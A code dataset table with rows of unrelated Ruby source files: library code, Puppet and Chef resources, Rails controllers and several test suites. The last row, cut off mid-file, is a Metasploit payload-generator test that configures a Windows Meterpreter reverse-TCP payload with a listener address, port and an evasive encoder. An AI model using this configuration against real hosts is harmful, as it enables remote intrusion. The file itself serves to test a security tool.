hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
ac2505f59db85ea9d797282ded4fceba3b7fca05 | 410 | # encoding: utf-8
require_relative 'checker_transformer_base'
module Epuber
class Transformer < CheckerTransformerBase
require_relative 'transformer/text_transformer'
# @return [Hash<Symbol, Class>]
#
def self.map_source_type__class
{
:result_text_xhtml_string => TextTransformer,
:source_text_file => TextTransformer,
}.merge(super)
end
end
end
| 20.5 | 53 | 0.692683 |
ac820ecbb94e24df7d6aafac0c8bfb0ac4edbcdc | 173 | describe file('/etc/syslog.sumologic.pem') do
it { is_expected.not_to exist }
end
describe file('/etc/rsyslog.d/sumologic.conf') do
it { is_expected.not_to exist }
end
| 21.625 | 49 | 0.734104 |
91ccb32de234a33f7b91aabf6e29cb71fc2c8dc8 | 5,208 | require 'pathname'
Puppet::Type.newtype(:dsc_spuserprofileserviceapppermissions) do
require Pathname.new(__FILE__).dirname + '../../' + 'puppet/type/base_dsc'
require Pathname.new(__FILE__).dirname + '../../puppet_x/puppetlabs/dsc_type_helpers'
@doc = %q{
The DSC SPUserProfileServiceAppPermissions resource type.
Automatically generated from
'SharePointDsc/DSCResources/MSFT_SPUserProfileServiceAppPermissions/MSFT_SPUserProfileServiceAppPermissions.schema.mof'
To learn more about PowerShell Desired State Configuration, please
visit https://technet.microsoft.com/en-us/library/dn249912.aspx.
For more information about built-in DSC Resources, please visit
https://technet.microsoft.com/en-us/library/dn249921.aspx.
For more information about xDsc Resources, please visit
https://github.com/PowerShell/DscResources.
}
validate do
fail('dsc_proxyname is a required attribute') if self[:dsc_proxyname].nil?
end
def dscmeta_resource_friendly_name; 'SPUserProfileServiceAppPermissions' end
def dscmeta_resource_name; 'MSFT_SPUserProfileServiceAppPermissions' end
def dscmeta_module_name; 'SharePointDsc' end
def dscmeta_module_version; '2.1.0.0' end
newparam(:name, :namevar => true ) do
end
ensurable do
newvalue(:exists?) { provider.exists? }
newvalue(:present) { provider.create }
defaultto { :present }
end
# Name: PsDscRunAsCredential
# Type: MSFT_Credential
# IsMandatory: False
# Values: None
newparam(:dsc_psdscrunascredential) do
def mof_type; 'MSFT_Credential' end
def mof_is_embedded?; true end
desc "PsDscRunAsCredential"
validate do |value|
unless value.kind_of?(Hash)
fail("Invalid value '#{value}'. Should be a hash")
end
PuppetX::Dsc::TypeHelpers.validate_MSFT_Credential("Credential", value)
end
end
# Name: ProxyName
# Type: string
# IsMandatory: True
# Values: None
newparam(:dsc_proxyname) do
def mof_type; 'string' end
def mof_is_embedded?; false end
desc "ProxyName - The name of the proxy that is attached to the user profile service you wish to set permissions for"
isrequired
validate do |value|
unless value.kind_of?(String)
fail("Invalid value '#{value}'. Should be a string")
end
end
end
# Name: CreatePersonalSite
# Type: string[]
# IsMandatory: False
# Values: None
newparam(:dsc_createpersonalsite, :array_matching => :all) do
def mof_type; 'string[]' end
def mof_is_embedded?; false end
desc "CreatePersonalSite - A list of user principals that will have the Create personal site permission"
validate do |value|
unless value.kind_of?(Array) || value.kind_of?(String)
fail("Invalid value '#{value}'. Should be a string or an array of strings")
end
end
munge do |value|
Array(value)
end
end
# Name: FollowAndEditProfile
# Type: string[]
# IsMandatory: False
# Values: None
newparam(:dsc_followandeditprofile, :array_matching => :all) do
def mof_type; 'string[]' end
def mof_is_embedded?; false end
desc "FollowAndEditProfile - A list of user principals that will have the Follow users and edit profile permission"
validate do |value|
unless value.kind_of?(Array) || value.kind_of?(String)
fail("Invalid value '#{value}'. Should be a string or an array of strings")
end
end
munge do |value|
Array(value)
end
end
# Name: UseTagsAndNotes
# Type: string[]
# IsMandatory: False
# Values: None
newparam(:dsc_usetagsandnotes, :array_matching => :all) do
def mof_type; 'string[]' end
def mof_is_embedded?; false end
desc "UseTagsAndNotes - A list of user principals that will have the Use tags and notes permission"
validate do |value|
unless value.kind_of?(Array) || value.kind_of?(String)
fail("Invalid value '#{value}'. Should be a string or an array of strings")
end
end
munge do |value|
Array(value)
end
end
# Name: InstallAccount
# Type: MSFT_Credential
# IsMandatory: False
# Values: None
newparam(:dsc_installaccount) do
def mof_type; 'MSFT_Credential' end
def mof_is_embedded?; true end
desc "InstallAccount - POWERSHELL 4 ONLY: The account to run this resource as, use PsDscRunAsCredential if using PowerShell 5"
validate do |value|
unless value.kind_of?(Hash)
fail("Invalid value '#{value}'. Should be a hash")
end
PuppetX::Dsc::TypeHelpers.validate_MSFT_Credential("InstallAccount", value)
end
end
def builddepends
pending_relations = super()
PuppetX::Dsc::TypeHelpers.ensure_reboot_relationship(self, pending_relations)
end
end
Puppet::Type.type(:dsc_spuserprofileserviceapppermissions).provide :powershell, :parent => Puppet::Type.type(:base_dsc).provider(:powershell) do
confine :true => (Gem::Version.new(Facter.value(:powershell_version)) >= Gem::Version.new('5.0.10586.117'))
defaultfor :operatingsystem => :windows
mk_resource_methods
end
| 33.384615 | 144 | 0.690092 |
18e015cf2fcec18660a515dc4485251b79bbde60 | 49 | module NvdFeedApi
VERSION = '0.3.1'.freeze
end
| 12.25 | 26 | 0.714286 |
f8a056b5122fd62276d25fdc7c6c5987454adf2a | 1,761 | require 'spec_helper'
describe Runaround::MethodCall do
context 'struct members' do
subject { described_class.new }
it { is_expected.to respond_to :method }
it { is_expected.to respond_to :args }
it { is_expected.to respond_to :opts }
it { is_expected.to respond_to :block }
it { is_expected.to respond_to :return_value }
it 'are in the correct order' do
expect(subject.members).to eql [
:method, :args, :opts, :block, :return_value]
end
end
describe '.argsopts' do
let(:mc) { described_class.new }
it 'appends the opts to the args when both exist' do
mc.args = [1,2,3]
mc.opts = { a: 'a', b: 'b' }
expect(mc.argsopts).to eql [1,2,3,{a: 'a', b: 'b'}]
end
it 'creates a new array when the args are nil' do
mc.opts = { a: 'a', b: 'b' }
expect(mc.argsopts).to eql [{a: 'a', b: 'b'}]
end
it 'does not add the opts when nil' do
mc.args = [:foo]
expect(mc.argsopts).to eql [:foo]
end
it 'does not add the opts when empty' do
mc.args = [:foo]
mc.opts = {}
expect(mc.argsopts).to eql [:foo]
end
it 'does not share the same array as the input args' do
mc.args = ['a']
result = mc.argsopts
mc.args << 'b'
expect(mc.args).to eql ['a', 'b']
expect(result).to eql ['a']
end
it 'does share the same opts hash' do
mc.opts = { a: 1 }
result = mc.argsopts
mc.opts[:b] = 2
expect(mc.opts).to eql({ a: 1, b: 2 })
expect(result).to eql([{ a: 1, b: 2 }])
end
end
describe '.run_method' do
let(:mc) { described_class.new }
it 'calls out to Fiber.yield' do
expect(Fiber).to receive(:yield)
mc.run_method
end
end
end
| 24.458333 | 59 | 0.574106 |
b9a1e559d46e2e3244fdcb3a5081aa890d97a28d | 1,669 | require 'rbconfig'
require 'timeout'
allowed_failures = ENV['TEST_BUNDLED_GEMS_ALLOW_FAILURES'] || ''
allowed_failures = allowed_failures.split(',').reject(&:empty?)
rake = File.realpath("../../.bundle/bin/rake", __FILE__)
gem_dir = File.realpath('../../gems', __FILE__)
exit_code = 0
ruby = ENV['RUBY'] || RbConfig.ruby
failed = []
File.foreach("#{gem_dir}/bundled_gems") do |line|
next if /^\s*(?:#|$)/ =~ line
gem = line.split.first
next if ARGV.any? {|pat| !File.fnmatch?(pat, gem)}
puts "\nTesting the #{gem} gem"
test_command = "#{ruby} -C #{gem_dir}/src/#{gem} -Ilib #{rake} test"
first_timeout = 600 # 10min
if gem == "rbs"
racc = File.realpath("../../libexec/racc", __FILE__)
pid = Process.spawn("#{ruby} -C #{gem_dir}/src/#{gem} -Ilib #{racc} -v -o lib/rbs/parser.rb lib/rbs/parser.y")
Process.waitpid(pid)
test_command << " stdlib_test validate"
first_timeout *= 3
end
puts test_command
pid = Process.spawn(test_command, "#{/mingw|mswin/ =~ RUBY_PLATFORM ? 'new_' : ''}pgroup": true)
{nil => first_timeout, INT: 30, TERM: 10, KILL: nil}.each do |sig, sec|
if sig
puts "Sending #{sig} signal"
Process.kill("-#{sig}", pid)
end
begin
break Timeout.timeout(sec) {Process.wait(pid)}
rescue Timeout::Error
end
end
unless $?.success?
puts "Tests failed with exit code #{$?.exitstatus}"
if allowed_failures.include?(gem)
puts "Ignoring test failures for #{gem} due to \$TEST_BUNDLED_GEMS_ALLOW_FAILURES"
else
failed << gem
exit_code = $?.exitstatus
end
end
end
puts "Failed gems: #{failed.join(', ')}" unless failed.empty?
exit exit_code
| 29.803571 | 114 | 0.641102 |
ed8af70b9206c243deafc0aa4c60cbd60237e031 | 678 | require 'yaml'
require 'sidekiq'
config_file = File.dirname(__FILE__) + '/../config.yml'
fail "Configuration file " + config_file + " missing!" unless File.exist?(config_file)
CONFIG = YAML.load_file(config_file)
redis_conn = proc {
Redis.new(
:driver => :hiredis,
:host => CONFIG['redis']['host'],
:port => CONFIG['redis']['port'],
:db => CONFIG['redis']['db'],
network_timeout: 5
)
}
Sidekiq.configure_client do |config|
config.redis = ConnectionPool.new(size: 27, &redis_conn)
end
require 'sidekiq/web'
Sidekiq::Web.use Rack::Session::Cookie, :secret => CONFIG['secret']
Sidekiq::Web.instance_eval { @middleware.rotate!(-1) }
run Sidekiq::Web
| 24.214286 | 86 | 0.676991 |
91bdcec55a4d5f1268eac28bc05de38ee82cdf4b | 1,459 | # frozen_string_literal: true
# WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/version-3/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
require 'aws-sdk-core'
require 'aws-sigv4'
require_relative 'aws-sdk-mediaconnect/types'
require_relative 'aws-sdk-mediaconnect/client_api'
require_relative 'aws-sdk-mediaconnect/client'
require_relative 'aws-sdk-mediaconnect/errors'
require_relative 'aws-sdk-mediaconnect/waiters'
require_relative 'aws-sdk-mediaconnect/resource'
require_relative 'aws-sdk-mediaconnect/customizations'
# This module provides support for AWS MediaConnect. This module is available in the
# `aws-sdk-mediaconnect` gem.
#
# # Client
#
# The {Client} class provides one method for each API operation. Operation
# methods each accept a hash of request parameters and return a response
# structure.
#
# media_connect = Aws::MediaConnect::Client.new
# resp = media_connect.add_flow_outputs(params)
#
# See {Client} for more information.
#
# # Errors
#
# Errors returned from AWS MediaConnect are defined in the
# {Errors} module and all extend {Errors::ServiceError}.
#
# begin
# # do stuff
# rescue Aws::MediaConnect::Errors::ServiceError
# # rescues all AWS MediaConnect API errors
# end
#
# See {Errors} for more information.
#
# @!group service
module Aws::MediaConnect
GEM_VERSION = '1.32.0'
end
| 26.527273 | 84 | 0.755312 |
0304c5612493dab74dd58c242de4f2b716e998ad | 9,468 | # frozen_string_literal: true
require "helper"
require "jobs/retry_job"
require "models/person"
require "minitest/mock"
class ExceptionsTest < ActiveSupport::TestCase
setup do
JobBuffer.clear
skip if adapter_skips_scheduling?(ActiveJob::Base.queue_adapter)
end
test "successfully retry job throwing exception against defaults" do
RetryJob.perform_later "DefaultsError", 5
assert_equal [
"Raised DefaultsError for the 1st time",
"Raised DefaultsError for the 2nd time",
"Raised DefaultsError for the 3rd time",
"Raised DefaultsError for the 4th time",
"Successfully completed job" ], JobBuffer.values
end
test "successfully retry job throwing exception against higher limit" do
RetryJob.perform_later "ShortWaitTenAttemptsError", 9
assert_equal 9, JobBuffer.values.count
end
test "keeps the same attempts counter for several exceptions listed in the same retry_on declaration" do
exceptions_to_raise = %w(FirstRetryableErrorOfTwo FirstRetryableErrorOfTwo FirstRetryableErrorOfTwo
SecondRetryableErrorOfTwo SecondRetryableErrorOfTwo)
assert_raises SecondRetryableErrorOfTwo do
RetryJob.perform_later(exceptions_to_raise, 5)
assert_equal [
"Raised FirstRetryableErrorOfTwo for the 1st time",
"Raised FirstRetryableErrorOfTwo for the 2nd time",
"Raised FirstRetryableErrorOfTwo for the 3rd time",
"Raised SecondRetryableErrorOfTwo for the 4th time",
"Raised SecondRetryableErrorOfTwo for the 5th time",
], JobBuffer.values
end
end
test "keeps a separate attempts counter for each individual retry_on declaration" do
exceptions_to_raise = %w(DefaultsError DefaultsError DefaultsError DefaultsError
FirstRetryableErrorOfTwo FirstRetryableErrorOfTwo FirstRetryableErrorOfTwo)
assert_nothing_raised do
RetryJob.perform_later(exceptions_to_raise, 10)
assert_equal [
"Raised DefaultsError for the 1st time",
"Raised DefaultsError for the 2nd time",
"Raised DefaultsError for the 3rd time",
"Raised DefaultsError for the 4th time",
"Raised FirstRetryableErrorOfTwo for the 5th time",
"Raised FirstRetryableErrorOfTwo for the 6th time",
"Raised FirstRetryableErrorOfTwo for the 7th time",
"Successfully completed job"
], JobBuffer.values
end
end
test "failed retry job when exception kept occurring against defaults" do
RetryJob.perform_later "DefaultsError", 6
assert_equal "Raised DefaultsError for the 5th time", JobBuffer.last_value
rescue DefaultsError
pass
end
test "failed retry job when exception kept occurring against higher limit" do
RetryJob.perform_later "ShortWaitTenAttemptsError", 11
assert_equal "Raised ShortWaitTenAttemptsError for the 10th time", JobBuffer.last_value
rescue ShortWaitTenAttemptsError
pass
end
test "discard job" do
RetryJob.perform_later "DiscardableError", 2
assert_equal "Raised DiscardableError for the 1st time", JobBuffer.last_value
end
test "custom handling of discarded job" do
RetryJob.perform_later "CustomDiscardableError", 2
assert_equal "Dealt with a job that was discarded in a custom way. Message: CustomDiscardableError", JobBuffer.last_value
end
test "custom handling of job that exceeds retry attempts" do
RetryJob.perform_later "CustomCatchError", 6
assert_equal "Dealt with a job that failed to retry in a custom way after 6 attempts. Message: CustomCatchError", JobBuffer.last_value
end
test "long wait job" do
travel_to Time.now
random_amount = 1
Kernel.stub(:rand, random_amount) do
RetryJob.perform_later "LongWaitError", 2, :log_scheduled_at
assert_equal [
"Raised LongWaitError for the 1st time",
"Next execution scheduled at #{(Time.now + 3600.seconds + random_amount).to_f}",
"Successfully completed job"
], JobBuffer.values
end
end
test "exponentially retrying job includes jitter" do
travel_to Time.now
random_amount = 2
Kernel.stub(:rand, random_amount) do
RetryJob.perform_later "ExponentialWaitTenAttemptsError", 5, :log_scheduled_at
assert_equal [
"Raised ExponentialWaitTenAttemptsError for the 1st time",
"Next execution scheduled at #{(Time.now + 3.seconds + random_amount).to_f}",
"Raised ExponentialWaitTenAttemptsError for the 2nd time",
"Next execution scheduled at #{(Time.now + 18.seconds + random_amount).to_f}",
"Raised ExponentialWaitTenAttemptsError for the 3rd time",
"Next execution scheduled at #{(Time.now + 83.seconds + random_amount).to_f}",
"Raised ExponentialWaitTenAttemptsError for the 4th time",
"Next execution scheduled at #{(Time.now + 258.seconds + random_amount).to_f}",
"Successfully completed job"
], JobBuffer.values
end
end
test "retry jitter uses value from ActiveJob::Base.retry_jitter by default" do
old_jitter = ActiveJob::Base.retry_jitter
ActiveJob::Base.retry_jitter = 4.0
travel_to Time.now
Kernel.stub(:rand, ->(arg) { arg }) do
RetryJob.perform_later "ExponentialWaitTenAttemptsError", 5, :log_scheduled_at
assert_equal [
"Raised ExponentialWaitTenAttemptsError for the 1st time",
"Next execution scheduled at #{(Time.now + 7.seconds).to_f}",
"Raised ExponentialWaitTenAttemptsError for the 2nd time",
"Next execution scheduled at #{(Time.now + 82.seconds).to_f}",
"Raised ExponentialWaitTenAttemptsError for the 3rd time",
"Next execution scheduled at #{(Time.now + 407.seconds).to_f}",
"Raised ExponentialWaitTenAttemptsError for the 4th time",
"Next execution scheduled at #{(Time.now + 1282.seconds).to_f}",
"Successfully completed job"
], JobBuffer.values
end
ensure
ActiveJob::Base.retry_jitter = old_jitter
end
test "custom wait retrying job" do
travel_to Time.now
RetryJob.perform_later "CustomWaitTenAttemptsError", 5, :log_scheduled_at
assert_equal [
"Raised CustomWaitTenAttemptsError for the 1st time",
"Next execution scheduled at #{(Time.now + 2.seconds).to_f}",
"Raised CustomWaitTenAttemptsError for the 2nd time",
"Next execution scheduled at #{(Time.now + 4.seconds).to_f}",
"Raised CustomWaitTenAttemptsError for the 3rd time",
"Next execution scheduled at #{(Time.now + 6.seconds).to_f}",
"Raised CustomWaitTenAttemptsError for the 4th time",
"Next execution scheduled at #{(Time.now + 8.seconds).to_f}",
"Successfully completed job"
], JobBuffer.values
end
test "use individual execution timers when calculating retry delay" do
travel_to Time.now
exceptions_to_raise = %w(ExponentialWaitTenAttemptsError CustomWaitTenAttemptsError ExponentialWaitTenAttemptsError CustomWaitTenAttemptsError)
random_amount = 1
Kernel.stub(:rand, random_amount) do
RetryJob.perform_later exceptions_to_raise, 5, :log_scheduled_at
assert_equal [
"Raised ExponentialWaitTenAttemptsError for the 1st time",
"Next execution scheduled at #{(Time.now + 3.seconds + random_amount).to_f}",
"Raised CustomWaitTenAttemptsError for the 2nd time",
"Next execution scheduled at #{(Time.now + 2.seconds).to_f}",
"Raised ExponentialWaitTenAttemptsError for the 3rd time",
"Next execution scheduled at #{(Time.now + 18.seconds + random_amount).to_f}",
"Raised CustomWaitTenAttemptsError for the 4th time",
"Next execution scheduled at #{(Time.now + 4.seconds).to_f}",
"Successfully completed job"
], JobBuffer.values
end
end
test "successfully retry job throwing one of two retryable exceptions" do
RetryJob.perform_later "SecondRetryableErrorOfTwo", 3
assert_equal [
"Raised SecondRetryableErrorOfTwo for the 1st time",
"Raised SecondRetryableErrorOfTwo for the 2nd time",
"Successfully completed job" ], JobBuffer.values
end
test "discard job throwing one of two discardable exceptions" do
RetryJob.perform_later "SecondDiscardableErrorOfTwo", 2
assert_equal [ "Raised SecondDiscardableErrorOfTwo for the 1st time" ], JobBuffer.values
end
test "successfully retry job throwing DeserializationError" do
RetryJob.perform_later Person.new(404), 5
assert_equal ["Raised ActiveJob::DeserializationError for the 5 time"], JobBuffer.values
end
test "running a job enqueued by AJ 5.2" do
job = RetryJob.new("DefaultsError", 6)
job.exception_executions = nil # This is how jobs from Rails 5.2 will look
assert_raises DefaultsError do
job.enqueue
end
assert_equal 5, JobBuffer.values.count
end
test "running a job enqueued and attempted under AJ 5.2" do
job = RetryJob.new("DefaultsError", 6)
# Fake 4 previous executions under AJ 5.2
job.exception_executions = nil
job.executions = 4
assert_raises DefaultsError do
job.enqueue
end
assert_equal ["Raised DefaultsError for the 5th time"], JobBuffer.values
end
private
def adapter_skips_scheduling?(queue_adapter)
[
ActiveJob::QueueAdapters::InlineAdapter,
ActiveJob::QueueAdapters::AsyncAdapter,
ActiveJob::QueueAdapters::SneakersAdapter
].include?(queue_adapter.class)
end
end
| 37.571429 | 147 | 0.721694 |
21e406100b5bfb4c6e507c7d3e5cb0127b5f7aa5 | 453 | # frozen_string_literal: true
# Copyright (c) 2008-2013 Michael Dvorkin and contributors.
#
# Fat Free CRM is freely distributable under the terms of MIT license.
# See MIT-LICENSE file or http://www.opensource.org/licenses/mit-license.php
#------------------------------------------------------------------------------
FactoryBot.define do
factory :list, class: FatFreeCrm::List do
name { "Foo List" }
url { "/controller/action" }
end
end
| 32.357143 | 79 | 0.604857 |
33b7ad205683fea785adbbd710dc102ef43b4936 | 59 | class Issue < ActiveRecord::Base
belongs_to :project
end
| 14.75 | 32 | 0.779661 |
e9fc6006c5fe137a42c55f6786d8dffb9e5df410 | 3,464 | require 'spec_helper_acceptance'
require 'yaml'
RUN_IN_PARALLEL = ENV.fetch('BEAKER_RUN_IN_PARALLEL', '')
.split(',').include?('tests')
test_name 'tpm2 class'
describe 'tpm2 class' do
let(:tpm2_abrmd2_hieradata) do
{
# Required to use the IBM simulator
'tpm2::tabrm_options' => ['--tcti=/usr/lib64/libtss2-tcti-mssim.so.0']
}
end
let(:tpm2_abrmd1_hieradata) do
{
# Required to use the IBM simulator
'tpm2::tabrm_options' => ['-t socket']
}
end
let(:manifest) do
<<-MANIFEST
include 'tpm2'
MANIFEST
end
hosts.each do |host|
context "on #{host} with tpm" do
it 'should install tpm2-abrmd' do
install_package(host, 'tpm2-abrmd')
end
it 'should install and start the TPM2 simulator' do
install_package(host, 'simp-tpm2-simulator')
on(host, 'puppet resource service simp-tpm2-simulator ensure=running enable=true')
end
# TODO: Undo this when
# https://github.com/tpm2-software/tpm2-abrmd/pull/680/files makes it into
# mainline
it 'should disable selinux for testing' do
on(host, 'setenforce 0')
end
it 'should set the hieradata appropriately' do
tpm2_abrmd_version = on(host, 'tpm2-abrmd --version').stdout.split(/\s+/).last
if tpm2_abrmd_version
if tpm2_abrmd_version.split('.').first.to_i > 1
set_hieradata_on(host, tpm2_abrmd2_hieradata)
else
set_hieradata_on(host, tpm2_abrmd1_hieradata)
end
end
end
end
end
context 'with default settings' do
it 'should apply with no errors' do
apply_manifest_on(hosts, manifest, run_in_parallel: RUN_IN_PARALLEL)
apply_manifest_on(
hosts, manifest,
catch_failures: true,
run_in_parallel: RUN_IN_PARALLEL
)
end
it 'should be idempotent' do
sleep 20
apply_manifest_on(
hosts, manifest,
catch_changes: true,
run_in_parallel: RUN_IN_PARALLEL
)
end
# If you're troubleshooting this, there are a few things that have stopped
# the tpm2-adbrmd service from starting:
# - selinux denies with AVC/USER_AVC:
# (check with `ausearch -i -m avc,user_avc -ts recent`):
# - tpm2-tabrmd from opening a socket
# - tpm2-tabrmd from connecting to the (unconfined) tpm2-simulator
# - dbus is confused
# (check with `journalctl -xe | grep -i dbus)`:
# - tpm2-tabrmd service dies immediately after systemctl reports it
# started successfully; no AVC problems reported
it 'should be running the tpm2-abrmd service' do
hosts.entries.each do |host|
stdout = on(host, 'puppet resource service tpm2-abrmd --to_yaml').stdout
service = YAML.safe_load(stdout)['service']['tpm2-abrmd']
expect{ service['ensure'].to eq 'running' }
end
end
it 'should query tpm2 information with facter' do
hosts.entries.each do |host|
stdout = on(host, 'facter -p -y tpm2 --strict').stdout
fact = YAML.safe_load(stdout)['tpm2']
expect{ fact['tpm2_getcap'].to be_a Hash }
expect{ fact['tpm2_getcap']['properties-fixed'].to be_a Hash }
expect{ fact['tpm2_getcap']['properties-fixed']['TPM_PT_FAMILY_INDICATOR']['as string'].to eq '2.0' }
expect{ fact['manufacturer'].to eq 'IBM ' }
end
end
end
end
| 30.121739 | 109 | 0.630774 |
260ab1aa54dcf27da5017e33b099b2b1624168a8 | 3,683 | class TestimonialsController < ApplicationController
before_filter :except => :index do |controller|
controller.ensure_logged_in t("layouts.notifications.you_must_log_in_to_give_feedback")
end
before_filter :ensure_authorized_to_give_feedback, :except => :index
before_filter :ensure_feedback_not_given, :except => :index
# Skip auth token check as current jQuery doesn't provide it automatically
skip_before_filter :verify_authenticity_token, :only => [:skip]
def index
username = params[:person_id]
target_user = Person.find_by!(username: username, community_id: @current_community.id)
if request.xhr?
@testimonials = TestimonialViewUtils.received_testimonials_in_community(target_user, @current_community).paginate(:per_page => params[:per_page], :page => params[:page])
limit = params[:per_page].to_i
render :partial => "people/testimonials", :locals => {:received_testimonials => @testimonials, :limit => limit}
else
redirect_to person_path(target_user)
end
end
def new
transaction = Transaction.find(params[:message_id])
testimonial = Testimonial.new
render(locals: { transaction: transaction, testimonial: testimonial})
end
def create
testimonial_params = params.require(:testimonial).permit(
:text,
:grade,
).merge(
receiver_id: @transaction.other_party(@current_user).id,
author_id: @current_user.id
)
@testimonial = @transaction.testimonials.build(testimonial_params)
if @testimonial.save
Delayed::Job.enqueue(TestimonialGivenJob.new(@testimonial.id, @current_community))
flash[:notice] = t("layouts.notifications.feedback_sent_to", :target_person => view_context.link_to(@transaction.other_party(@current_user).given_name_or_username, @transaction.other_party(@current_user))).html_safe
redirect_to person_transaction_path(:person_id => @current_user.id, :id => @transaction.id)
else
render :action => new
end
end
def skip
is_author = @transaction.author == @current_user
if is_author
@transaction.update_attributes(author_skipped_feedback: true)
else
@transaction.update_attributes(starter_skipped_feedback: true)
end
respond_to do |format|
format.html {
flash[:notice] = t("layouts.notifications.feedback_skipped")
redirect_to single_conversation_path(:conversation_type => "received", :person_id => @current_user.id, :id => @transaction.id)
}
format.js { render :layout => false, locals: {is_author: is_author} }
end
end
private
def ensure_authorized_to_give_feedback
# Rails was giving some read-only records. That's why we have to do some manual queries here and use INCLUDES,
# not joins.
# TODO Move this to service
@transaction = Transaction
.includes(:listing)
.where("starter_id = ? OR listings.author_id = ?", @current_user.id, @current_user.id)
.where({
community_id: @current_community.id,
id: params[:message_id]
})
.references(:listing)
.first
if @transaction.nil?
flash[:error] = t("layouts.notifications.you_are_not_allowed_to_give_feedback_on_this_transaction")
redirect_to root and return
end
end
def ensure_feedback_not_given
transaction_entity = MarketplaceService::Transaction::Entity.transaction(@transaction)
waiting = MarketplaceService::Transaction::Entity.waiting_testimonial_from?(transaction_entity, @current_user.id)
unless waiting
flash[:error] = t("layouts.notifications.you_have_already_given_feedback_about_this_event")
redirect_to root and return
end
end
end
| 35.757282 | 221 | 0.725224 |
21ced22c0458e4cd3a25345d1b8887619a172bdf | 582 | module Oauth
module Controller
module Helper
extend ActiveSupport::Concern
included do
helper_method :require_access_token
end
def require_access_token
if token && token.valid?
true
else
respond_to do |format|
format.html { head :unauthorized }
format.json { render json: Oauth::Error::Unauthorized.to_json, status: 401 }
end
end
end
private
def token
Oauth::Token.find_by(token: params[:access_token])
end
end
end
end | 20.785714 | 88 | 0.579038 |
f776421d4fd40ce124b0031fe488c19ab33d60dc | 202 | #
# Cookbook Name:: mchx_dk
# Recipe:: zero
#
# Copyright (c) 2016 The Authors, All Rights Reserved.
include_recipe 'mchx_dk::chef_dk'
include_recipe 'mchx_dk::installs'
include_recipe 'mchx_dk::user'
| 20.2 | 54 | 0.752475 |
6a3860210960548d7a1f4251156a682ddb5018a5 | 2,904 | # typed: false
# frozen_string_literal: true
require "test/support/fixtures/testball"
require "formula"
describe Formula do
describe "#uses_from_macos" do
before do
allow(OS).to receive(:mac?).and_return(false)
end
it "acts like #depends_on" do
f = formula "foo" do
url "foo-1.0"
uses_from_macos("foo")
end
expect(f.class.stable.deps.first.name).to eq("foo")
expect(f.class.head.deps.first.name).to eq("foo")
end
it "ignores OS version specifications" do
f = formula "foo" do
url "foo-1.0"
uses_from_macos "foo", since: :mojave
end
expect(f.class.stable.deps.first.name).to eq("foo")
expect(f.class.head.deps.first.name).to eq("foo")
end
end
describe "#on_linux" do
it "adds a dependency on Linux only" do
f = formula do
homepage "https://brew.sh"
url "https://brew.sh/test-0.1.tbz"
sha256 TEST_SHA256
depends_on "hello_both"
on_macos do
depends_on "hello_macos"
end
on_linux do
depends_on "hello_linux"
end
end
expect(f.class.stable.deps[0].name).to eq("hello_both")
expect(f.class.stable.deps[1].name).to eq("hello_linux")
expect(f.class.stable.deps[2]).to eq(nil)
end
end
describe "#on_linux" do
it "adds a patch on Linux only" do
f = formula do
homepage "https://brew.sh"
url "https://brew.sh/test-0.1.tbz"
sha256 TEST_SHA256
patch do
on_macos do
url "patch_macos"
end
on_linux do
url "patch_linux"
end
end
end
expect(f.patchlist.length).to eq(1)
expect(f.patchlist.first.strip).to eq(:p1)
expect(f.patchlist.first.url).to eq("patch_linux")
end
end
describe "#on_linux" do
it "uses on_linux within a resource block" do
f = formula do
homepage "https://brew.sh"
url "https://brew.sh/test-0.1.tbz"
sha256 TEST_SHA256
resource "test_resource" do
on_linux do
url "on_linux"
end
end
end
expect(f.resources.length).to eq(1)
expect(f.resources.first.url).to eq("on_linux")
end
end
describe "#shared_library" do
it "generates a shared library string" do
f = Testball.new
expect(f.shared_library("foobar")).to eq("foobar.so")
expect(f.shared_library("foobar", 2)).to eq("foobar.so.2")
expect(f.shared_library("foobar", nil)).to eq("foobar.so")
expect(f.shared_library("foobar", "*")).to eq("foobar.so{,.*}")
expect(f.shared_library("*")).to eq("*.so{,.*}")
expect(f.shared_library("*", 2)).to eq("*.so.2")
expect(f.shared_library("*", nil)).to eq("*.so{,.*}")
expect(f.shared_library("*", "*")).to eq("*.so{,.*}")
end
end
end
| 24.403361 | 69 | 0.580234 |
1159f04cd3ab683a6f4e7dbea8ecbe1c77da84b7 | 46,434 | require 'spec_helper'
require 'msf/core/payload_generator'
RSpec.describe Msf::PayloadGenerator do
include_context 'Msf::Simple::Framework#modules loading'
# let(:lhost) { "192.168.172.1"}
# let(:lport) { "8443" }
# let(:datastore) { { "LHOST" => lhost, "LPORT" => lport } }
# let(:add_code) { false }
# let(:arch) { "x86" }
# let(:badchars) { "\x20\x0D\x0A" }
# let(:encoder_reference_name) {
# # use encoder_module to ensure it is loaded prior to passing to generator
# encoder_module.refname
# }
# let(:format) { "raw" }
# let(:iterations) { 1 }
# let(:keep) { false }
# let(:nops) { 0 }
# let(:payload_reference_name) {
# # use payload_module to ensure it is loaded prior to passing to generator
# payload_module.refname
# }
# let(:platform) { "Windows" }
# let(:space) { 1073741824 }
# let(:stdin) { nil }
# let(:template) { File.join(Msf::Config.data_directory, "templates", "template_x86_windows.exe") }
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
let!(:payload_module) {
load_and_create_module(
ancestor_reference_names: %w{
stagers/windows/reverse_tcp
stages/windows/meterpreter
},
module_type: 'payload',
reference_name: 'windows/meterpreter/reverse_tcp'
)
}
# let(:shellcode) { "\x50\x51\x58\x59" }
# let(:var_name) { 'buf' }
subject(:payload_generator) {
Msf::PayloadGenerator.new(generator_opts)
}
it { is_expected.to respond_to :add_code }
it { is_expected.to respond_to :arch }
it { is_expected.to respond_to :badchars }
it { is_expected.to respond_to :cli }
it { is_expected.to respond_to :encoder }
it { is_expected.to respond_to :datastore }
